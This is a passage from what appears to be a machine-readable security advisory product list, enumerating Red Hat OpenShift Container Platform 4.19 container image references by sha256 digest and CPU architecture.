"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-snapshotter-rhel9@sha256:fb63e1f96831506bc79fbdd4f78ee9da3913f86f128f538db70a8badc23ac854_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-livenessprobe-rhel9@sha256:07a5ff47f0ddbc7ac2293a6f6af6ed2a9cb4027e7ad61042863187df69babda3_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-livenessprobe-rhel9@sha256:1fbb335fd71191a6096d16c4769716255b833d9fbbfa60d4f12dc014e5d24da2_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-livenessprobe-rhel9@sha256:b8a54951f2fb26aa2b0cc93634a7147e4f2fa68a6986c527c5fda7ced2007e90_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-livenessprobe-rhel9@sha256:be5b247472e8155811e40b74a539d15d649c6175e469184aae7cc7a3ae435563_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-node-driver-registrar-rhel9@sha256:0f01b3199d4bbd7d691bd416ce41adb2123807534c965355e03ae0469425eb89_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-node-driver-registrar-rhel9@sha256:387d9d633840c30c52695f776e48e80031e110b05c9ef082597a5cdbf9f5eea2_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-node-driver-registrar-rhel9@sha256:68f71f58e04099967346c0fae031fde60887bbb7dd1041c4d83a0b98455dabd1_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-node-driver-registrar-rhel9@sha256:df471031bae8d15bb58bc650ab6d4b9f4fa3f0483cb65838ad147594ec9f33af_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-snapshot-controller-rhel9@sha256:07dfb0c56f132cd5acf76e5879f521be9abdcf5dc4e2fc663e89739f5e0d5538_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-snapshot-controller-rhel9@sha256:8f02237f34890ade5878008f0c923597951019454ac5353a63c6616dd33f8f2d_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-snapshot-controller-rhel9@sha256:9979f3eec067571040422a0ad1b96b993a415bf2743960292df2a95b279ca695_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-snapshot-controller-rhel9@sha256:b46b98d3ad75e63e9be7b603a77e27075653ec3afb7e8689fdd182cf40abd3f8_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-deployer-rhel9@sha256:3582bf5119513e9d51d83e2d1b3f70a955d2a0675e0b120ba7f6394e94b94e03_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-deployer-rhel9@sha256:6b0e909a37e06abaa39c795be926d2da861b9f00fd4c0be18fe7890d825cb6ed_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-deployer-rhel9@sha256:ab94610c1dd35f92ad186846735758cf5a301d9bc4e883b2692011988edb4fd3_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-deployer-rhel9@sha256:cf8b7ce2d36bccb2bcbee8bfd0de6bdae5dc40b0199059b2759d0aba56151baa_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-docker-builder-rhel9@sha256:510a2039d88a9f1ae59848d4f6589b7585f002c68f0da8f8a970685d7fb40a5e_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-docker-builder-rhel9@sha256:6db47ba74f791eb39da7af1862d8978da61cbfd88219441950861ef469cbe472_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-docker-builder-rhel9@sha256:6ec129d640af33af43d698593ae543d22394d0b7bb19b2fd89dfd257e5629ba3_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-docker-builder-rhel9@sha256:f09043d293b8948f83da5b5722a0edb74ae3f54b58eeea19c490c0112bad2071_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-docker-registry-rhel9@sha256:802e9ee888afb88e576fee42f11c7ee0d6fcbfb7b5213df16cac12c2b75a1d7c_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-docker-registry-rhel9@sha256:8cc4458a66fce822d175559277398c7aef9ddb383399efaf80650c2f350505fd_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-docker-registry-rhel9@sha256:bfbaa99fb697f2a352b97de52a35729481556ac4ad3efadf6b796356a2830fd3_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-docker-registry-rhel9@sha256:c1de6ec5108a02b21c15f44308fc3a9b4293f94353c0f25f11576a74fb21ce5d_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-etcd-rhel9@sha256:622a5b555fb855d565a2c66137c248a239a364c00671d271782695d144d8a56d_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-etcd-rhel9@sha256:640febb01fbe420ea03dcf3cc19bb8d0c9cf26c4af953133d51347baef830441_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-etcd-rhel9@sha256:ce22905d9a22de00509343c81f9400e436132912a9ae6ddf675c0928f3ea4d27_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-etcd-rhel9@sha256:d07ec10275070567596dfccce0a09bd2fbed9d5d452a813f26b1aa3d313b9d71_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-cloud-controller-manager-rhel9@sha256:7ecb1d8a291da4a5113355fb9cd53efbe82879d419678800984d8d2b0b1e2b60_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-cloud-controller-manager-rhel9@sha256:aa490b00e5c8c799fed61101cdcb32447eab6caf4c4c1037f1a7f9b5ee5c2500_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-cloud-controller-manager-rhel9@sha256:ac962f2ec19c1cf0922a5af1d60c6535da0d2bb2e3b1f2bf60f559e7c91fa659_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-cluster-api-controllers-rhel9@sha256:211d64fbaf9ecb4d767c4fddea4eadf048ff3783ab8aa28bde76844eaa735361_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-cluster-api-controllers-rhel9@sha256:c373f479b51f2bd757cac4f24479cb9056d7745d588cd3a563c364dd63a55d88_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-cluster-api-controllers-rhel9@sha256:fadf5aa90de3fda8b5253c6338406a0eb64866e3f3aab1bfc5f5c0713f3c4277_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-operator-rhel9@sha256:b8604b708e45c6b23f0f82a5dca52077d30819e646da9d45cf7f93bcbf58f3ce_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-operator-rhel9@sha256:e089a7b006efdb5583e05d087a02e0e0416577e913e3d5c6f4cff6918d564436_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-operator-rhel9@sha256:eb327d173c6e77b0c6a60c3774ba0246ce5e2df01639e7bbb59952e9b92e65f6_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-rhel9@sha256:7cf202edc41319fe4b36e57b8663292e9cd6a04c632237a5184a0b441dfcf761_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-rhel9@sha256:b3cb2b6d300c2b2d579c7f8c7f66b52fbc891717e29d7b85c204b518093f529f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-rhel9@sha256:b9332849e3b7652afc5dcad447cabeeb884066723a3b174c43fdd39d5651c67e_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-workload-identity-federation-webhook-rhel9@sha256:50f27ddd76331df3b0b34c55391976f546f664f0d7a34130fc57c0d8ba9ee75f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-workload-identity-federation-webhook-rhel9@sha256:5ff71a6725a51510527d6497b921474a5e735dd4cb53b984ed8af54595b1cd1a_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-workload-identity-federation-webhook-rhel9@sha256:70b4576443acce236a5bc1244d7bb7ccd11c22b307e8d302fd0038dfc61efa73_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-workload-identity-federation-webhook-rhel9@sha256:c948760bcc0d498230283dc4126370ac9e98eb1d0bdceccdc0a5f20f8b851b9c_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-haproxy-router-rhel9@sha256:596d00eb17bd6f00e2b26605db7a54bf04425c6a8a188f5a373643530a4c79ca_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-haproxy-router-rhel9@sha256:c3fddc9f6c1e96c29dc018fb30d9f70814390cc4b111089264d4cc82378da5ad_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-haproxy-router-rhel9@sha256:dae117e1d6954cb63417510332fc70b5bafb19e0cc618fc103ef4b6581ecbfdb_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-haproxy-router-rhel9@sha256:fb23578b8ce937223392967c69b130551572dfab261815242d42ab090f999853_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-hyperkube-rhel9@sha256:720cd3b89d18772d0230731f18dadae46bdb48b4b83d4c3c2afee787eb966f49_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-hyperkube-rhel9@sha256:b207edd030f98804d2dd7a7055b5bb5bfa5008c3c6753ecaffb7fbc0bf18d56a_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-hyperkube-rhel9@sha256:e3a086f93b62590794af9f69fc273b3125fd88184e8467b3531d02521282ca06_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-hyperkube-rhel9@sha256:fb2ea87732bd32c58d57656d38d3393bc7c48bb6edc41bc23464dc25ec2c72b7_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-hypershift-rhel9@sha256:1a62f6e266959b7ac07e5b79dfec40cd78be425a6b394b8201857632067db88d_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-hypershift-rhel9@sha256:42e9b35962e1716efd05d11f66862be9711397b87be5c16de41ca67e4fb123db_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-hypershift-rhel9@sha256:9549947e4c8b0005815e651ebc1cbde8adeed54d89ace772f7c87210624cf587_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-hypershift-rhel9@sha256:e6ef275bd908e468f74c371734c00cc8e34fda230407b11caca2ca0e4a8cb98a_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibm-cloud-controller-manager-rhel9@sha256:a02dab2c1d82d33beb22f0d834e89ee5d9d000717c5c9773a86315446222e3d5_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibm-cloud-controller-manager-rhel9@sha256:b692a262776393fe214b1f5e16690098f0ba9c52da91ef168d67915bd4d915b6_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibm-vpc-block-csi-driver-rhel9-operator@sha256:0eec1806c1aebb18c929da840845a8acff65ddc2066d343f2d02b3dd080954e1_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibm-vpc-block-csi-driver-rhel9-operator@sha256:d82c48027fa2cc1aa104eaca2dfc6c556316cbf6a1bd6b0cacfb5ce8f010c028_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibm-vpc-block-csi-driver-rhel9@sha256:36145ed08ac5a3071011ff44e0411e3ded8d3483cf59d296c4795043f13f8e10_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibm-vpc-block-csi-driver-rhel9@sha256:6b27224dacb73ea14d2d561add8d93b960a69b602233731b29b134ad732de8d6_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibmcloud-cluster-api-controllers-rhel9@sha256:5dd61548a039d382bb8e0af3e31dfff8d6ec4c5edfccff587c94ece6e8b53281_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibmcloud-cluster-api-controllers-rhel9@sha256:e0ca3155faa73128c74048ce8082773be395f0072b87d01b9f4cd973f48d5486_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibmcloud-cluster-api-controllers-rhel9@sha256:fd6b29e7ed8f0d58789237c6cb855980611e3d03bcd0628ba4ba8e6beff4c155_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibmcloud-machine-controllers-rhel9@sha256:8d950f862e7b1c75962ed4357e08b0b071f606dc9fa797e10708cbd69dccc705_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibmcloud-machine-controllers-rhel9@sha256:bf3fa8833ab188a275570bc9f3e58dc4f174015221c3d7aa388468b38b2aec5c_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-image-customization-controller-rhel9@sha256:173bbd5617f3d72c0b111b073dfba182a6e13562cc205ac707610e4bc99c1b24_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-image-customization-controller-rhel9@sha256:4efe2d4316675a37da7f0536a891bcf2e4aeadf52bdc4678e6946f8884d3b4fe_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-insights-rhel9-operator@sha256:0745552aff8b52b7c604cb52765a1aa4ac038b856cf0ceaa61db217515dc9337_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-insights-rhel9-operator@sha256:b88a20e45675d4a9a238d64cb0b6dacc162b4ec207251e5ae7c68303644ac306_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-insights-rhel9-operator@sha256:c5227faf255e647c6444c423132e4de3562ac3279a17a2665be03d4e6bba9750_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-insights-rhel9-operator@sha256:ed35e169497b1564059e5bffeba1da87648ce27b7f6a09474d25a19bd22cf9bf_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-installer-artifacts-rhel9@sha256:084a30f22516957c012928dcca3c9729cdb9e6199039e758c9d468cd22c1244a_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-installer-artifacts-rhel9@sha256:60bf3d574a9289b95a0d999a8e653df107ee3fa888bf367436aee7417ceaf3c4_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-installer-artifacts-rhel9@sha256:9dd7dfbd3499b485fd5765aba6384127c2777796ec50b182fc7ef63303835bc0_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-installer-artifacts-rhel9@sha256:a3169dfd6918dd2108992611cdd3f14525e9f5e5d05cbd174007373ca3442c5c_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-installer-rhel9@sha256:10bda9f9f7f635c444b59e1d0db17776fe52ce9a3e39aba1d0ad339cde9dfcd3_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-installer-rhel9@sha256:21db43c73f7fe5af15ce187586dee84e949ea0a8a3f10fb2da428b3806b3c686_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-installer-rhel9@sha256:723e5bc45bbcfcd5d3ae97339bba491d383876c094f17f8300be5ed6fdc9591f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-installer-rhel9@sha256:f54ba33d1bcd4d7053ee4baf0d16a2b5af52f0e5a123f6c3bd0976ddacd027a4_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ironic-agent-rhel9@sha256:3e31d1ece33dffbe5b4d54b888a2d16fe2137f6f35c99a7e5122ff8e0125250d_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ironic-agent-rhel9@sha256:dd33a77af11d0f36915205c343eff9bfa86a9a774d82796e6e1f0d8bf454defd_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ironic-machine-os-downloader-rhel9@sha256:47995224ef8ebb0c96f589b4e65d0303ec25cdf337f1593443e5558f58820748_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ironic-machine-os-downloader-rhel9@sha256:e33a0af2825ccfcd6d29470feabfd1710adda01a7a189957f04cc76d02e504db_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ironic-rhel9@sha256:46ce51221a7b62f026ea8958b2e70a4956e48dfffe46196941a232a0a0374e9c_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ironic-rhel9@sha256:f5f3cef14751cc722c6d793f20f2f29e51dcb50eb0a27f182e1cb5cef0a169db_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ironic-static-ip-manager-rhel9@sha256:02b842b08e52152114669293b4e74a0be77c6b142157787d0a394830ea71f376_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ironic-static-ip-manager-rhel9@sha256:f2487a02cdd1eef6fb3b9462a39768a8f51110bf9321bc7229898a0c7d7dec4a_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-keepalived-ipfailover-rhel9@sha256:2f381d5e585969b0ec3585d0b3ad338dd8067af067835993832abd50b9094957_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-keepalived-ipfailover-rhel9@sha256:bf2079d194c311cb1d41b1004f20753190145015c5dd9cdf124c46f62b9e4a15_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-keepalived-ipfailover-rhel9@sha256:dda8095185ee7997bb9a804fe5a2ebf519e5a5cf53a70439ff2771d21bc24f41_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-keepalived-ipfailover-rhel9@sha256:f51f73917d40e7fc6eab7e9700eb2c253f16c62173d103eb6b38daba651e17cf_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-proxy-rhel9@sha256:4b6046eefed5840fa2ded2d2164a088ed3cfd22b50c2c05ebafd92a3190e1854_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-proxy-rhel9@sha256:b71de8c64a624d154400844e3f95992e3c5c4090adeecb5158404a6b4cac6be5_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-proxy-rhel9@sha256:c471af7de03ccb0fd093a774ee727a3d7712fc073773ad6e0180004d3d1f8fba_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-proxy-rhel9@sha256:dbfe8e54acdfbfc04d1014cae94d227bd45e92d127139a615312e1012485dfa7_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-rbac-proxy-rhel9@sha256:3509c3e8eaea4bd214c01ad94d9f9f7ce342103e2cecbc1badacfe4b968946e5_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-rbac-proxy-rhel9@sha256:b06062b58d2db8dae5dfdf6cb413858d5c79f7935d59c1d2397c81d40e377d88_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-rbac-proxy-rhel9@sha256:dae79f64ec77c8deccdad3c4b451940387d8a081e5cdec911c43c5d475b32256_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-rbac-proxy-rhel9@sha256:fdae399bd29a16232ccaf26fb70b74685c899c0a2ee12910b71a8ae3fcf268ef_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-state-metrics-rhel9@sha256:6267c3fdcdc21c0af4b42a9aa609f164956f0e996162bc87d7466453aa2aad35_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-state-metrics-rhel9@sha256:85a45cc6d79a04a9175d26598325f0a4a1dd3fc279c99aeabe1a6293acc97506_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-state-metrics-rhel9@sha256:aff5468f2fbe57381b15f3e7ca5bcc6b970d554ba239704ec256252b4eddf141_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-state-metrics-rhel9@sha256:c0479910cf5b778058431462c989f6a84d45b12b90f7b8d5e6d041b685e15805_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-storage-version-migrator-rhel9@sha256:0360e8bd3841088dbaca2ec4d960f77f11c70d54d6e5d3b7ce003307b5d04ff8_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-storage-version-migrator-rhel9@sha256:358e506102e7de0a527fd5cb78018395b6fa93683b556e4b3549879e3849291d_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-storage-version-migrator-rhel9@sha256:6931003b4a38864328a012655388fcf8475e79ef4f5d97cda18924571df436a6_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-storage-version-migrator-rhel9@sha256:b77f9bbb2cff61a07a2a3ef19b3b06245a1aef3537c1bae47a349906983865ea_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kubevirt-cloud-controller-manager-rhel9@sha256:17794053b3ede5275c7115f7d33a3402dcfb0328ffe1a5df86b296ed9e7e0e9d_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kubevirt-cloud-controller-manager-rhel9@sha256:3062abd2eeed1e94d36b2ef11f78c951e56d14792f06c73b0de554522591f506_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kubevirt-cloud-controller-manager-rhel9@sha256:6dbd254f4edee48593ff7e3e58a201cd02ee9cf9cb3cfb007c409b7bfa34137a_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kubevirt-cloud-controller-manager-rhel9@sha256:805c6881556aebde1af449f5fd8c2fd61e02a8e661890a13c17860c618953abe_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-libvirt-machine-controllers-rhel9@sha256:7a4ce4e7146c846b4450f0f027dd07d3f5e32d40b3bc7e167032eef302c618f5_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-libvirt-machine-controllers-rhel9@sha256:aa4406e97de26cacc019d382930ff3f749893d8a79d7e5d03ce5f37ce265e7fe_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-libvirt-machine-controllers-rhel9@sha256:b9e9fa1e81c89ac933903ab395e215ddb0b0850973d3789d7e969512789906ca_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-libvirt-machine-controllers-rhel9@sha256:ddb230986001dba038e11d3f59a650b25721a7e3e2ee15319e5aef8d3e46782a_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-aws-rhel9@sha256:60c3470aba8dac67522d1ddb34e57289dce5a2974d65e0cb34a13931e6d5976b_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-aws-rhel9@sha256:6bc5ed044cf1d286364f620c26a428842b3b17010574a5b937bb7095181aa8d4_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-azure-rhel9@sha256:0cfb374c9ae690b499b72fa43e985c6593bb8a461464f57b014f22f1774059b0_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-azure-rhel9@sha256:4afa5a31ec371dc1cff20d2d3547d15e39b7eda901b96d4b95024b9b5e1e8d13_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-gcp-rhel9@sha256:59413cffc1a85c76b6e161666f8c06dc6525092466130520d0002547ba824df3_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-gcp-rhel9@sha256:863b30b65dfedac6d384bf7c0b69670777452f6e19a4ef3a0fe9902cd4b08bf2_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-gcp-rhel9@sha256:eb58e580aac2f881aef5e6de30c588ea8efbc35edd33736a8830a1442e1878e7_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-openstack-rhel9@sha256:486e3158229579453dafa3438862a2000603dc40d8e92edb8fe59734244ad786_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-openstack-rhel9@sha256:5cfb798541e25e1bb1592f157222a40b31b680a85336bab0c88af98606313a46_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-openstack-rhel9@sha256:81bf0b5564a44be0cee22fce23cf7237fc2db06ad8c67bc81673d9bdc8f82a18_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-openstack-rhel9@sha256:eca21187e941910b53c4a325413f455e73aa2954f9e286232326ba8c71c0154a_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-rhel9-operator@sha256:042bf2a1e502809836efca400fc7d7b9e781697611b59cbfd34874a909019518_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-rhel9-operator@sha256:1e7d336b0b1ab6e865635976d2b704debfd8b2ee3370d869d614c7c99b7e2113_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-rhel9-operator@sha256:448aa273da6d50833fa4485fa39bd2ae0248ade7d7e6ace95dbccac96e62ffe3_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-rhel9-operator@sha256:7bf94fbd24315a72727f2957d2b106fdbfe6c2d6129f38c3ef4d8d174a298f51_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-config-rhel9-operator@sha256:4b36552929bc8cfe57e8d24d48aea83515351b5b1339a3c43ff8ced0a1bf1d4f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-config-rhel9-operator@sha256:542fd2652f1cd2f47478979e1ba39295889a54cc28e6f6a642554ad4c5cc93cb_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-config-rhel9-operator@sha256:f7ed54888aa22a6c19700077522c97adf372f38cf4350a009e644590182fb3cb_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-config-rhel9-operator@sha256:faf9e3ec97eb13e2bd96d2c5ffb80ffd09486f67fd1c0d14a605438a8d24b95e_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-os-images-rhel9@sha256:20b9ee6a4f6c462c2b53a6d449ed18c20a9f3917f94f08548a451e83e6f4a1c9_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-os-images-rhel9@sha256:32bcdfbd738620ad414cad2ebb45abd3beeae96c7ae6f06c403441d22ecc4abb_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-os-images-rhel9@sha256:a10d9edf5c9ae4f1840c8f122665f2cc83a4e01c23be42a48509c3416dec2f2a_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-os-images-rhel9@sha256:dae201a6d76006d1f2b9933f9672cb21affd0af056dc99bc2143ecabeeeac8ee_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-monitoring-plugin-rhel9@sha256:03d3c5b12eb66d08cacf9800def4bc0a0ca2561b8725fa897e943345e4bd441f_amd64",
